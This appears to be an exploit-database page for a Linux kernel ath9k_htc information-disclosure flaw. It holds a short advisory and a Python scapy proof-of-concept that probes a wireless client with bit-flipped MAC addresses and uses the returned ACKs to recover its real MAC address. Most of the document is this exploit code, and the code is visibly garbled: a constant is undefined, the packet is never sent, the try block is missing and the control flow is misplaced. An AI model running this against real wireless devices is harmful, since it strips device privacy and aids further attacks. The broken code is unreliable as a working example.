Linux Kernel 3.0.5 – ‘ath9k_htc_set_bssid_mask()’ Information Disclosure

  • 作者: Mathy Vanhoef
    日期: 2013-12-10
  • 类别:
  • 来源:
  • source:
    Linux Kernel is prone to an information-disclosure vulnerability.
    An attacker can exploit this issue to obtain sensitive information like original MAC address; information obtained may aid in other attacks.
    Note: This BID was previously titled 'Atheros Wireless Drivers MAC Address Information Disclosure Vulnerability'. The title and technical details have been changed to better reflect the underlying component affected. 
    import logging
    from scapy.all import *
    import random
    # number of times to inject probe for one bit (combat packet loss)
    # time to wait for ACK in seconds
    SNIFFTIME = 0.3
    def randmac():
    	mac = [0] * 6
    	for i in xrange(6):
    		mac[i] = random.randint(0, 256)
    	# avoid multicast/broadcast mac
    	mac[0] = mac[0] & 0xFE
    	return ":".join([format(byte, '02x') for byte in mac])
    def parsemac(macstr):
    	parts = macstr.replace("-", ":").split(":")
    	if len(parts) != 6:
    		raise ValueError("MAC does not consist of 6 parts (separated by : or -)")
    	return [int(byte, 16) for byte in parts]
    def is_ack(p):
    	return Dot11 in p and p.type == 1 and p.subtype == 13
    def find_fixed_bits(s, mac):
    	# eventually contains the real MAC address
    	orgmac = [0] * 6
    	# random MAC address, used as sender, to which the target will send an ACK
    	srcmac = randmac()
    	# for all the bits - FIXME: Don't consider H.O. bit of first MAC byte
    	for i in range(6):
    		for bit in range(8):
    			# flip the bit at current position
    			currbit = mac[i] & (1 << bit)
    			mac[i] ^= (1 << bit)
    			# convert modified mac to string
    			strmac = ":".join([format(byte, '02x') for byte in mac])
    			print "Probing", strmac, "...",
    			replied = False
    			for attempt in range(ATTEMPTS_PER_BIT):
    				# inject data packet to modified MAC address
    				packet = Dot11(type="Data", subtype=4, FCfield="from-DS",
    						addr1=strmac, addr2=srcmac, addr3=strmac)
    				# Sniff air for ACK to modified MAC
    				l = sniff(lfilter=lambda p: is_ack(p) and p.addr1 == srcmac, count=1,
    						timeout=SNIFFTIME, opened_socket=s)
    				# We we got an ACK, don't need to try again
    				if len(l) == 1:
    					replied = True
    			print replied
    			# If client replied, original bit is different from the one currently set,
    			# otherwise it's equal to original bit.
    			if replied:
    				orgmac[i] |= (~currbit) & (1 << bit)
    				orgmac[i] |= currbit
    			# flip bit back to original value
    			mac[i] ^= (1 << bit)
    	# Done, return original MAC
    	return orgmac
    if __name__ == "__main__":
    	if len(sys.argv) != 3:
    		print "Usage:", sys.argv[0], "interface macaddr"
    		mac = parsemac(sys.argv[2])
    		conf.iface = sys.argv[1]
    		# Open up read/write socket so we don't miss the ACK
    		L2socket = conf.L2socket
    		s = L2socket(type=ETH_P_ALL, iface=conf.iface)
    		# Now find the MAC
    		orgmac = find_fixed_bits(s, mac)
    		print "\nReal MAC address:", ":".join(format(byte, "02x") for byte in orgmac), "\n"
    	except ValueError, e:
    		print "Invalid MAC address:", e
    	except socket.error, e:
    		print "Error with provided interface:", e